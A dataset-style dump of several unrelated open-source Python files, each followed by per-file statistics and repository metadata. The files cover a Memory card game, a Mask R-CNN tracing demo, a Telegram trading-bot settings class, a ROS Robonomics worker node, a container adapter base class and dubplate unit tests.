        elif hint == 'maven2': hint, layout = 'maven', 'maven-2'
        return hint, layout + '-default'

    def getYumCapabilities(self, path):
        """Return the repository ids that have a Yum capability configured
        in conf/capabilities.xml (empty list when the file is absent)."""
        xml = os.path.join(path, 'conf', 'capabilities.xml')
        if not os.path.isfile(xml): return []
        yumrepos = []
        root = ET.parse(xml).getroot()
        for cap in root.find('capabilities').findall('capability'):
            tid = cap.find('typeId').text
            # TODO add 'yum.merge' to this list when Artifactory starts
            # supporting virtual Yum repositories
            if tid not in ('yum.generate', 'yum.proxy'): continue
            props = {}
            for prop in cap.find('properties').findall('property'):
                props[prop.find('key').text] = prop.find('value').text
            yumrepos.append(props['repository'])
        return yumrepos
| 41.336 | 79 | 0.543255 | 553 | 5,167 | 5.061483 | 0.285714 | 0.022865 | 0.018221 | 0.011433 | 0.100036 | 0.075027 | 0.043587 | 0.043587 | 0.043587 | 0.043587 | 0 | 0.003699 | 0.319915 | 5,167 | 124 | 80 | 41.669355 | 0.792829 | 0.017999 | 0 | 0.08547 | 0 | 0 | 0.169789 | 0.008282 | 0 | 0 | 0 | 0.008065 | 0 | 1 | 0.042735 | false | 0 | 0.034188 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eefe1977906d53f705ef27c60547b06a9610720 | 2,523 | py | Python | memory_game/memory_game.py | Jimut123/code_skulptor_pygames | 1bb2c65f5bc5519f3caed956a6f5a55a7359fcb3 | [
"MIT"
] | 2 | 2018-11-17T21:12:16.000Z | 2018-12-06T15:04:27.000Z | memory_game/memory_game.py | Jimut123/code_skulptor_pygames | 1bb2c65f5bc5519f3caed956a6f5a55a7359fcb3 | [
"MIT"
] | null | null | null | memory_game/memory_game.py | Jimut123/code_skulptor_pygames | 1bb2c65f5bc5519f3caed956a6f5a55a7359fcb3 | [
"MIT"
] | null | null | null | # implementation of card game - Memory
import simplegui
import random
# for repetition check
# helper function to initialize globals
def new_game():
    """Reset the globals for a fresh game: a shuffled 16-card deck
    (two copies of each value 0-7), all cards face down, turn state
    cleared and the turn counter label reset.

    NOTE: relies on Python 2 semantics (range returns a list), as
    required by the CodeSkulptor/simplegui environment.
    """
    cards1 = range(0,8)
    cards2 = range(0,8)
    random.shuffle(cards1)
    random.shuffle(cards2)
    global cardDeck
    cardDeck = cards1 + cards2
    # final shuffle of the combined deck determines the layout
    random.shuffle(cardDeck)
    global exposed
    exposed = [False] * 16      # which cards are currently face up
    global turns, count
    turns = [-1] * 2            # indices of the cards flipped this turn
    count = 0                   # number of completed turns
    label.set_text("Turns = " + str(count))
# define event handlers
def mouseclick(pos):
    """Handle a click on a card; cards are 50px wide so pos[0] / 50 is
    the clicked card's index. Implements the three-state turn machine:
    0 flips the first card, 1 flips the second and counts a turn, 2
    resolves the previous pair before starting a new turn."""
    # add game state logic here
    global turns, count
    # if its 1st Turn just flip (state 0)
    if turns[0] == -1 and exposed[pos[0] / 50] == False:
        turns[0] = pos[0] / 50
        exposed[turns[0]] = True
    # if its 2nd Turn (state 1)
    elif turns[1] == -1 and exposed[pos[0] / 50] == False:
        turns[1] = pos[0] / 50
        exposed[turns[1]] = True
        #increase overall count of turns after end of both turns
        count += 1
        label.set_text("Turns = " + str(count))
        if False not in exposed:
            label.set_text("Won the Game in " + str(count) + " Turns, Press Reset for New Game!" )
    # if its 1st Turn (state 2)
    elif turns[1] != -1 and exposed[pos[0] / 50] == False:
        # if cards doesn't pair flip back both
        if cardDeck[turns[0]] != cardDeck[turns[1]]:
            exposed[turns[1]] = False
            exposed[turns[0]] = False
            turns[1] = -1
            turns[0] = pos[0] / 50
            exposed[turns[0]] = True
        else:
            # pair stays exposed; start the next turn with this card
            turns[1] = -1
            turns[0] = pos[0] / 50
            exposed[turns[0]] = True
# cards are logically 50x100 pixels in size
def draw(canvas):
    """Render all 16 cards: the value on a white face for exposed cards,
    a green back otherwise. Cards are logically 50x100 pixels."""
    for index, card in enumerate(cardDeck):
        left = index * 50
        corners = [(left, 0), (left + 50, 0), (left + 50, 100), (left, 100)]
        if exposed[index] == True:
            canvas.draw_polygon(corners, 1, 'Black', 'White')
            canvas.draw_text(str(card), (left + 10, 70), 65, 'Red')
        else:
            canvas.draw_polygon(corners, 1, 'Black', 'Green')
# create frame and add a button and labels
frame = simplegui.create_frame("Memory", 800, 100)
frame.add_button("Reset", new_game)
label = frame.add_label("Turns = 0")

# register event handlers
frame.set_mouseclick_handler(mouseclick)
frame.set_draw_handler(draw)

# get things rolling: initialize state and start the event loop
new_game()
frame.start()
| 30.39759 | 133 | 0.575109 | 348 | 2,523 | 4.123563 | 0.298851 | 0.041812 | 0.029268 | 0.036237 | 0.26899 | 0.256446 | 0.221603 | 0.221603 | 0.202787 | 0.182578 | 0 | 0.070831 | 0.289338 | 2,523 | 82 | 134 | 30.768293 | 0.729504 | 0.180341 | 0 | 0.264151 | 0 | 0 | 0.052632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.037736 | 0 | 0.09434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d6feb2821863a29b4221e191fc8923133c2fe913 | 2,585 | py | Python | shepherd/sheep/base_sheep.py | iterait/shepherd | 0847c9885584378dd68a48c40d03f9bb02b2b57c | [
"MIT"
] | 5 | 2018-10-13T19:03:07.000Z | 2019-02-25T06:44:27.000Z | shepherd/sheep/base_sheep.py | iterait/shepherd | 0847c9885584378dd68a48c40d03f9bb02b2b57c | [
"MIT"
] | 62 | 2018-09-13T08:03:39.000Z | 2022-01-03T09:05:54.000Z | shepherd/sheep/base_sheep.py | iterait/shepherd | 0847c9885584378dd68a48c40d03f9bb02b2b57c | [
"MIT"
] | null | null | null | import abc
import logging
from typing import List, Optional
from asyncio import Queue
import zmq.asyncio
from zmq.error import ZMQBaseError
from schematics import Model
from schematics.types import StringType, IntType, ListType
class BaseSheep(metaclass=abc.ABCMeta):
    """
    A base class for container adapters - classes that allow launching different kinds of containers.
    """

    class Config(Model):
        # adapter type identifier, runner port, and devices assigned to
        # this sheep (schematics validation model)
        type: str = StringType(required=True)
        port: int = IntType(required=True)
        devices: List[str] = ListType(StringType, default=lambda: [])

    # parsed configuration for this sheep (populated by subclasses)
    _config: Config

    def __init__(self, socket: zmq.asyncio.Socket, sheep_data_root: str):
        """
        Create new :py:class:`BaseSheep`.

        :param socket: socket for feeding sheep's runner with InputMessages
        :param sheep_data_root: sheep data root with job working directories
        """
        self._config: Optional[self.Config] = None
        self.socket: zmq.asyncio.Socket = socket
        self.jobs_queue: Queue = Queue()  # queue of jobs to be processed
        self.model_name: Optional[str] = None  # current model name
        self.model_version: Optional[str] = None  # current model version
        self.sheep_data_root: Optional[str] = sheep_data_root
        self.in_progress: set = set()  # set of job_ids which are currently sent for processing to the sheep's runner

    def _load_model(self, model_name: str, model_version: str) -> None:
        """Tell the sheep to prepare a new model (without restarting)."""
        self.model_name = model_name
        self.model_version = model_version

    def start(self, model_name: str, model_version: str) -> None:
        """
        (Re)start the sheep with the given model name and version.
        Any unfinished jobs will be lost, socket connection will be reset.

        :param model_name: model name
        :param model_version: model version
        """
        if self.running:
            self.slaughter()
        self._load_model(model_name, model_version)
        # drop the record of in-flight jobs; their results will never come
        self.in_progress = set()
        self.socket.connect("tcp://0.0.0.0:{}".format(self._config.port))

    def slaughter(self) -> None:
        # disconnect from the runner; failure is non-fatal because the
        # socket may never have been connected in the first place
        zmq_address = 'tcp://0.0.0.0:{}'.format(self._config.port)
        try:
            self.socket.disconnect(zmq_address)
        except ZMQBaseError:
            logging.warning('Failed to disconnect socket (perhaps it was not started/connected)')

    @property
    @abc.abstractmethod
    def running(self) -> bool:
        """Is the sheep running, i.e. capable of accepting computation requests?"""
d9040f536e5e7d98863330b02abf8e1540d41786 | 7,340 | py | Python | demo/trace.py | nicolasCruzW21/maskrcnn-Tracing | da648eb09f7034faa7b29a48543d777d05968d82 | [
"MIT"
] | 3 | 2020-06-10T04:37:01.000Z | 2021-12-20T07:45:48.000Z | demo/trace.py | nicolasCruzW21/maskrcnn-Tracing | da648eb09f7034faa7b29a48543d777d05968d82 | [
"MIT"
] | 1 | 2020-06-17T09:05:31.000Z | 2021-09-13T09:16:36.000Z | demo/trace.py | nicolasCruzW21/maskrcnn-Tracing | da648eb09f7034faa7b29a48543d777d05968d82 | [
"MIT"
] | 1 | 2020-07-06T05:47:12.000Z | 2020-07-06T05:47:12.000Z | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import argparse
import cv2
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import torch
import time
from PIL import Image
import numpy
from matplotlib import pyplot
def combine_masks_tuple(input_model):
    # type: (Tuple[Tensor, Tensor, Tensor, Tensor, Tensor, Tensor]) -> Tensor
    """Overlay every detection mask onto the image, colouring each mask
    according to its label via the palette; returns the composited image."""
    image_with_mask, bboxes, labels, masks, scores, palette = input_model
    # fixed rendering parameters (contours on, bbox rectangles off)
    threshold, padding = 0.5, 1
    contour, rectangle = True, False
    height = width = 800
    for idx in range(masks.size(0)):
        label_color = ((palette * labels[idx]) % 255).to(torch.uint8)
        pasted = my_paste_mask(masks[idx, 0], bboxes[idx], height, width,
                               threshold, padding, contour, rectangle)
        image_with_mask = torch.where(pasted.unsqueeze(-1),
                                      label_color.unsqueeze(0).unsqueeze(0),
                                      image_with_mask)
    return image_with_mask
def processImage(name, size, model):
    """Load an image, resize to (size, size), convert RGB->BGR, subtract
    the configured pixel mean and return a (1, C, H, W) float tensor on
    the model's device."""
    pil_image = Image.open(name).convert("RGB")
    pil_image = pil_image.resize((size, size), Image.BILINEAR)
    bgr = torch.from_numpy(numpy.array(pil_image)[:, :, [2, 1, 0]])
    mean = torch.tensor(cfg.INPUT.PIXEL_MEAN)[:, None, None]
    normalized = bgr.float().permute(2, 0, 1) - mean
    return normalized.unsqueeze(0).to(model.device)
def processImageCPU(name, size, model):
    """Load and resize an image, returning an (H, W, C) uint8 BGR tensor
    on the CPU. (`model` is unused; the parameter is kept so the
    signature mirrors processImage.)"""
    pil_image = Image.open(name).convert("RGB")
    pil_image = pil_image.resize((size, size), Image.BILINEAR)
    return torch.from_numpy(numpy.array(pil_image)[:, :, [2, 1, 0]])
def my_paste_mask(mask, bbox, height, width, threshold=0.5, padding=1, contour=False, rectangle=False):
    # type: (Tensor, Tensor, int, int, float, int, bool, bool) -> Tensor
    """Paste a fixed-size mask into a (height, width) canvas at `bbox`,
    optionally reducing it to its contour and/or adding the bounding-box
    rectangle. Returns a (height, width) mask tensor (bool, or float when
    contour processing is applied). Written to be torch.jit traceable."""
    padded_mask = torch.constant_pad_nd(mask, (padding, padding, padding, padding))
    #print("mask.size(-1)",mask.size(-1))
    # scale factor compensating for the added padding
    scale = 1.0 + 2.0 * float(padding) / float(mask.size(-1))
    #print("scale",scale)
    # bbox center and half-extents, scaled up by the padding factor
    center_x = (bbox[2] + bbox[0]) * 0.5
    center_y = (bbox[3] + bbox[1]) * 0.5
    w_2 = (bbox[2] - bbox[0]) * 0.5 * scale
    h_2 = (bbox[3] - bbox[1]) * 0.5 * scale  # should have two scales?
    bbox_scaled = torch.stack([center_x - w_2, center_y - h_2,
                               center_x + w_2, center_y + h_2], 0)
    TO_REMOVE = 1
    w = (bbox_scaled[2] - bbox_scaled[0] + TO_REMOVE).clamp(min=1).long()
    h = (bbox_scaled[3] - bbox_scaled[1] + TO_REMOVE).clamp(min=1).long()
    # custom C++ op registered by maskrcnn_benchmark
    scaled_mask = torch.ops.maskrcnn_benchmark.upsample_bilinear(padded_mask.float(), h, w)
    x0 = bbox_scaled[0].long()
    y0 = bbox_scaled[1].long()
    x = x0.clamp(min=0)
    y = y0.clamp(min=0)
    #print("scaled_mask",scaled_mask.size())
    # clip the pasted region to the canvas on all four sides
    leftcrop = x - x0
    topcrop = y - y0
    w = torch.min(w - leftcrop, width - x)
    h = torch.min(h - topcrop, height - y)
    #print("h",h,"w",w)
    #mask = torch.zeros((height, width), dtype=torch.uint8)
    #mask[y:y + h, x:x + w] = (scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold)
    # threshold, then pad out to the full canvas size instead of indexing
    # into a preallocated tensor (keeps the graph traceable)
    mask = torch.constant_pad_nd((scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold),
                                 (int(x), int(width - x - w), int(y), int(height - y - h)))  # int for the script compiler
    if contour:
        mask = mask.float()
        # poor person's contour finding by comparing to smoothed
        mask = (mask - torch.nn.functional.conv2d(mask.unsqueeze(0).unsqueeze(0),
                torch.full((1, 1, 3, 3), 1.0 / 9.0), padding=1)[0, 0]).abs() > 0.001
    if rectangle:
        x = torch.arange(width, dtype=torch.long).unsqueeze(0)
        y = torch.arange(height, dtype=torch.long).unsqueeze(1)
        r = bbox.long()
        # work around script not liking bitwise ops
        rectangle_mask = ((((x == r[0]) + (x == r[2])) * (y >= r[1]) * (y <= r[3]))
                          + (((y == r[1]) + (y == r[3])) * (x >= r[0]) * (x <= r[2])))
        mask = (mask + rectangle_mask).clamp(max=1)
    #print(mask.size())
    return mask
def main():
    """Trace the Mask R-CNN single-image prediction function with
    torch.jit, save it to traced.pt, then reload it and visualize the
    predictions on two test images."""
    parser = argparse.ArgumentParser(description="PyTorch Object Detection Webcam Demo")
    parser.add_argument(
        "--config-file",
        default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
        metavar="FILE",
        help="path to config file",
    )
    parser.add_argument(
        "--confidence-threshold",
        type=float,
        default=0.7,
        help="Minimum score for the prediction to be shown",
    )
    parser.add_argument(
        "--min-image-size",
        type=int,
        default=224,
        help="Smallest size of the image to feed to the model. "
             "Model was trained with 800, which gives best results",
    )
    parser.add_argument(
        "--show-mask-heatmaps",
        dest="show_mask_heatmaps",
        help="Show a heatmap probability for the top masks-per-dim masks",
        action="store_true",
    )
    parser.add_argument(
        "--masks-per-dim",
        type=int,
        default=2,
        help="Number of heatmaps per dimension to show",
    )
    parser.add_argument(
        "opts",
        help="Modify model config options using the command-line",
        default=None,
        nargs=argparse.REMAINDER,
    )
    args = parser.parse_args()
    # load config from file and command-line arguments
    cfg.merge_from_file(args.config_file)
    cfg.merge_from_list(args.opts)
    cfg.freeze()
    # prepare object that handles inference plus adds predictions on top of image
    coco_demo = COCODemo(
        cfg,
        confidence_threshold=args.confidence_threshold,
        show_mask_heatmaps=args.show_mask_heatmaps,
        masks_per_dim=args.masks_per_dim,
        min_image_size=args.min_image_size,
    )
    start_time = time.time()  # (unused)
    image = processImage("test.jpg", 800, coco_demo)
    image2 = processImageCPU("test.jpg", 800, coco_demo)
    # warm-up run before tracing
    coco_demo.single_image_to_top_predictions(image)
    # freeze parameters and switch to eval mode for tracing
    for p in coco_demo.model.parameters():
        p.requires_grad_(False)
    coco_demo.model = coco_demo.model.eval()
    with torch.jit.optimized_execution(False):
        traced_model = torch.jit.trace(coco_demo.single_image_to_top_predictions, image, check_trace=False)
    traced_model.save('traced.pt')
    print("done tracing")
    print("testing first image:")
    loaded = torch.jit.load("traced.pt")
    boxes, labels, masks, scores = loaded(image)
    # palette used to derive a per-label color from the label id
    palette = torch.tensor([3, 32767, 2097151])
    input_model = image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
    result_image1 = combine_masks_tuple(input_model)
    # BGR -> RGB for matplotlib display
    pyplot.imshow(result_image1[:, :, [2, 1, 0]])
    pyplot.show()
    print("testing second image:")
    image = processImage("test2.jpg", 800, coco_demo)
    image2 = processImageCPU("test2.jpg", 800, coco_demo)
    boxes, labels, masks, scores = loaded(image)
    palette = torch.tensor([3, 32767, 2097151])
    input_model = image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
    result_image1 = combine_masks_tuple(input_model)
    pyplot.imshow(result_image1[:, :, [2, 1, 0]])
    pyplot.show()
if __name__ == "__main__":
main()
| 38.229167 | 178 | 0.639646 | 1,033 | 7,340 | 4.38819 | 0.247822 | 0.031767 | 0.017648 | 0.022943 | 0.287889 | 0.229429 | 0.168101 | 0.168101 | 0.14251 | 0.120009 | 0 | 0.032421 | 0.218392 | 7,340 | 191 | 179 | 38.429319 | 0.757713 | 0.107902 | 0 | 0.134228 | 0 | 0 | 0.098622 | 0.011792 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033557 | false | 0 | 0.060403 | 0 | 0.120805 | 0.020134 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d904b9c8e847f19331cc7dff09301eaaa05f6fd5 | 5,275 | py | Python | src/config.py | tfhkzp/telegram_follow_trader | ea32ba63d230d7244967d57a1cb8ade608e2761a | [
"MIT"
] | 1 | 2020-12-17T16:51:27.000Z | 2020-12-17T16:51:27.000Z | src/config.py | tfhkzp/telegram_follow_trader | ea32ba63d230d7244967d57a1cb8ade608e2761a | [
"MIT"
] | null | null | null | src/config.py | tfhkzp/telegram_follow_trader | ea32ba63d230d7244967d57a1cb8ade608e2761a | [
"MIT"
] | null | null | null | import os
from configparser import RawConfigParser
import constants
import utils
class Config(RawConfigParser):
    """INI-backed application settings stored at <platform dir>/setting.ini.

    The file is created with default values on first run; every mutating
    helper persists the in-memory state to disk via save().
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Section names used throughout the application.
        self.disclaimer_section_header = "disclaimer"
        self.telegram_section_header = "telegram"
        self.telegram_dialog_section_header = "telegram_dialog_setting"
        self.trade_account_section_header = "trade_account_setting"
        self.trade_section_header = "trade_setting"
        # Per-dialog sections are named "<prefix><dialog_id>".
        self.telegram_dialog_setting_prefix = "telegram_dialog_"
        self.file_path = utils.get_dir_path_by_platform() + "setting.ini"
        self.create_setting_file_when_not_exists()
        self.read(self.file_path)

    def create_setting_file_when_not_exists(self):
        """Write a settings file populated with defaults if none exists yet."""
        if not os.path.exists(self.file_path):
            self[self.disclaimer_section_header] = {
                'disclaimer_version': 'LOCAL',
                'understand_and_agree': 'N'
            }
            self[self.telegram_section_header] = {
                'api_id': '',
                'api_hash': '',
                'phone_number': ''
            }
            self[self.telegram_dialog_section_header] = {
                'default_dialog_id': ''
            }
            self[self.trade_account_section_header] = {
                'port': 11111
            }
            self[self.trade_section_header] = {
                'trade_mode': constants.TradeMode.FIXED_QUANTITY,
                'trade_product_hsi': 'Y',
                'trade_product_mhi': 'N',
                'hsi_trade_quantity': 1,
                'mhi_trade_quantity': 1,
                'hsi_margin': 150000,
                'mhi_margin': 30000,
                'trade_period_morning': 'Y',
                'trade_period_afternoon': 'Y',
                'trade_period_night': 'Y',
                'open_extra_price': 0,
                'close_price_adjust_interval': 1,
                'cancel_unfulfilled_order_after_second': 10,
                'trade_only_within_second': 3,
                'manual_confirm_trade_message': 'Y'
            }
            self.save()

    def get(self, section, code):
        """Read option *code* from *section*.

        If only the option is missing from an existing section, it is
        created with an empty value, persisted, and "" is returned.
        A missing section still raises NoSectionError (from set()), which
        get_telegram_dialog_setting relies on to detect unconfigured
        dialogs.  The original bare ``except:`` is narrowed to the two
        configparser errors that super().get() actually raises here.
        """
        from configparser import NoOptionError, NoSectionError
        try:
            return super().get(section, code)
        except (NoOptionError, NoSectionError):
            # set() re-raises NoSectionError when the section is absent,
            # matching the original observable behaviour.
            self.set(section, code, "")
            self.save()
            return ""

    def save(self):
        """Persist the settings to disk.

        Fix: use a context manager so the handle is closed; the original
        ``self.write(open(self.file_path, 'w'))`` leaked the file object.
        """
        with open(self.file_path, 'w') as setting_file:
            self.write(setting_file)

    def get_disclaimer_version(self):
        """Return the version of the disclaimer the user last saw."""
        return self.get(self.disclaimer_section_header, "disclaimer_version")

    def save_disclaimer_version(self, value):
        """Store and persist the disclaimer version."""
        self.set(self.disclaimer_section_header, "disclaimer_version", value)
        self.save()

    def get_disclaimer_understand_and_agree(self):
        """Return 'Y'/'N' flag recording whether the user accepted the disclaimer."""
        return self.get(self.disclaimer_section_header, "understand_and_agree")

    def save_disclaimer_understand_and_agree(self, value):
        """Store and persist the disclaimer acceptance flag."""
        self.set(self.disclaimer_section_header, "understand_and_agree", value)
        self.save()

    def save_telegram_dialog_setting(self, dialog_id, open_buy_template, close_buy_template, open_sell_template,
                                     close_sell_template, time_format):
        """Store the message templates for one Telegram dialog and persist them.

        Fix: the original never called save(), so dialog settings were lost
        unless some other write happened later; now persisted immediately,
        consistent with every other setter in this class.
        """
        self[self.telegram_dialog_setting_prefix + str(dialog_id)] = {
            'open_buy_template': open_buy_template,
            'close_buy_template': close_buy_template,
            'open_sell_template': open_sell_template,
            'close_sell_template': close_sell_template,
            'time_format': time_format
        }
        self.save()

    def get_telegram_dialog_setting(self, dialog_id):
        """Return the template settings dict for *dialog_id*, or None if the
        dialog has never been configured (its section does not exist)."""
        from configparser import NoSectionError
        try:
            section_header = self.telegram_dialog_setting_prefix + str(dialog_id)
            open_buy_template = self.get(section_header, 'open_buy_template')
            close_buy_template = self.get(section_header, 'close_buy_template')
            open_sell_template = self.get(section_header, 'open_sell_template')
            close_sell_template = self.get(section_header, 'close_sell_template')
            time_format = self.get(section_header, 'time_format')
            return {
                'open_buy_template': open_buy_template,
                'close_buy_template': close_buy_template,
                'open_sell_template': open_sell_template,
                'close_sell_template': close_sell_template,
                'time_format': time_format
            }
        except NoSectionError:
            return None

    def get_default_telegram_dialog_id(self):
        """Return the id of the dialog followed by default."""
        return self.get(self.telegram_dialog_section_header, "default_dialog_id")

    def save_default_telegram_dialog_id(self, value):
        """Store and persist the default dialog id."""
        self.set(self.telegram_dialog_section_header, "default_dialog_id", value)
        self.save()

    def get_trade_port(self):
        """Return the trade-account API port (stored as a string)."""
        return self.get(self.trade_account_section_header, "port")

    def save_trade_port(self, value):
        """Store and persist the trade-account API port."""
        self.set(self.trade_account_section_header, "port", value)
        self.save()

    def get_telegram_setting(self, code):
        """Return one option from the [telegram] section."""
        return self.get(self.telegram_section_header, code)

    def set_telegram_setting(self, code, value):
        """Set one option in the [telegram] section (not persisted; call save())."""
        self.set(self.telegram_section_header, code, value)

    def get_trade_setting(self, code):
        """Return one option from the [trade_setting] section."""
        return self.get(self.trade_section_header, code)

    def set_trade_setting(self, code, value):
        """Set one option in the [trade_setting] section (not persisted; call save())."""
        self.set(self.trade_section_header, code, value)
| 39.074074 | 112 | 0.630711 | 595 | 5,275 | 5.161345 | 0.171429 | 0.118528 | 0.041029 | 0.052752 | 0.64409 | 0.477043 | 0.327906 | 0.24422 | 0.128623 | 0.128623 | 0 | 0.006023 | 0.276019 | 5,275 | 134 | 113 | 39.365672 | 0.798115 | 0 | 0 | 0.175439 | 0 | 0 | 0.162844 | 0.034502 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.035088 | 0.052632 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d908ab4f59b016aac181ee4e124679993f2e35d0 | 1,579 | py | Python | 05_open_sensor_data/scripts/worker.py | Vourhey/robonomics_tutorials | 3dd7ad5db9037f0c681b93ebe1fdfca46ef9761d | [
"BSD-3-Clause"
] | 1 | 2020-02-10T17:27:46.000Z | 2020-02-10T17:27:46.000Z | 05_open_sensor_data/scripts/worker.py | Vourhey/robonomics_tutorials | 3dd7ad5db9037f0c681b93ebe1fdfca46ef9761d | [
"BSD-3-Clause"
] | null | null | null | 05_open_sensor_data/scripts/worker.py | Vourhey/robonomics_tutorials | 3dd7ad5db9037f0c681b93ebe1fdfca46ef9761d | [
"BSD-3-Clause"
] | 1 | 2020-04-30T06:48:26.000Z | 2020-04-30T06:48:26.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ROS
import rospy
from std_msgs.msg import String
# Robonomics communication
from robonomics_msgs.msg import Demand, Result
from ipfs_common.msg import Multihash
from ipfs_common.ipfs_rosbag import IpfsRosBag
class WorkerNode:
    """ROS node that answers matching Robonomics demands with a sensor result.

    Subscribes to incoming demand messages and, for demands whose model
    multihash matches the ``~model`` parameter, publishes a signed Result
    containing a rosbag of sensor data pinned to IPFS.
    """

    def __init__(self):
        """Register the node, the demand subscriber and the result publisher."""
        rospy.init_node("worker_node")
        rospy.loginfo("Launching worker node...")
        rospy.Subscriber('/liability/infochan/incoming/demand', Demand, self.on_incoming_demand)
        self.result_publish = rospy.Publisher('/liability/infochan/eth/signing/result', Result, queue_size=128)
        rospy.loginfo("The node is launched")

    def on_incoming_demand(self, demand: Demand):
        """Handle a demand; respond only when its model matches ours."""
        rospy.loginfo("Incoming demand: {}".format(demand))
        if demand.model.multihash != rospy.get_param("~model"):
            rospy.loginfo("Demand is not for me")
            return
        self.send_result(demand)

    def pack_result(self) -> Multihash:
        """Bundle the sensor payload into an IPFS rosbag and return its multihash."""
        payload = {
            "/data": [
                String("Hello from my sensor!")
            ]
        }
        return IpfsRosBag(messages=payload).multihash

    def send_result(self, demand: Demand):
        """Build a Result for *demand* and publish it for signing."""
        rospy.loginfo("Collecting data...")
        result = Result()
        result.liability = demand.sender
        result.result = self.pack_result()
        result.success = True
        rospy.loginfo("Result: {}".format(result))
        self.result_publish.publish(result)

    def spin(self):
        """Block until ROS shutdown, servicing callbacks."""
        rospy.spin()
if __name__ == "__main__":
    # Entry point: construct the node (registers subscriber/publisher) and
    # block until ROS shuts down.
    WorkerNode().spin()
| 26.762712 | 111 | 0.624446 | 180 | 1,579 | 5.305556 | 0.416667 | 0.075393 | 0.027225 | 0.041885 | 0.058639 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004263 | 0.257125 | 1,579 | 58 | 112 | 27.224138 | 0.809889 | 0.045598 | 0 | 0 | 0 | 0 | 0.156458 | 0.048602 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.131579 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90aaafe7f9c1c206b79ec748e75d1bc2e4fe249 | 14,009 | py | Python | dubplate/tests/test_dubplate.py | GreenBuildingRegistry/dubplate | 5bb11abfd17c557a7be63acfb1ede7834ea17b88 | [
"MIT"
] | 1 | 2018-04-20T08:33:40.000Z | 2018-04-20T08:33:40.000Z | dubplate/tests/test_dubplate.py | GreenBuildingRegistry/dubplate | 5bb11abfd17c557a7be63acfb1ede7834ea17b88 | [
"MIT"
] | null | null | null | dubplate/tests/test_dubplate.py | GreenBuildingRegistry/dubplate | 5bb11abfd17c557a7be63acfb1ede7834ea17b88 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
copyright (c) 2016-2017 Earth Advantage. All rights reserved.
..codeauthor::Paul Munday <paul@paulmunday.net>
Unit tests for dubplate.
"""
# Imports from Standard Library
import datetime
import json
import sys
import six
import unittest
# Imports from Third Party Modules
from frozendict import frozendict
# Local Imports
from dubplate import Record, empty_slot
PY3 = sys.version_info[0] == 3
if PY3:
from unittest import mock
else:
import mock
# Constants
NS = 'http://example.org/ns'
NAMESPACE = {'n': NS}
class TstRecord(Record):
    """Minimal Record subclass used as the base fixture in these tests.

    Declares two slot attributes so tests can distinguish attribute access
    (``record.test``) from record-data item access (``record['key']``).
    """
    # pylint:disable=slots-on-old-class,too-few-public-methods
    __slots__ = ['service', 'test']

    def __init__(self, service, test, **kwargs):
        self.service = service
        self.test = test
        # Remaining keyword arguments become the immutable record data.
        super(TstRecord, self).__init__(**kwargs)
class FieldRecord(TstRecord):
    """Fixture: record keys limited to ('a', 'b', 'c'); 'a' and 'b' non-null."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    fields = ('a', 'b', 'c')
    non_null_fields = ('a', 'b')
class RequiredFieldRecord(TstRecord):
    """Fixture: 'a' and 'b' are required/non-null but the key set is open."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    non_null_fields = ('a', 'b')
class RequireAllFieldsRecord(TstRecord):
    """Fixture: every declared field must be supplied on construction."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    fields = ('a', 'b', 'c')
    non_null_fields = ('a', 'b')
    require_all_fields = True
class HashIndexRecord(TstRecord):
    """Fixture: hash-index key built from record keys 'a' and 'b'."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    hash_index_fields = ('a', 'b')
class HashIndexSlotsRecord(TstRecord):
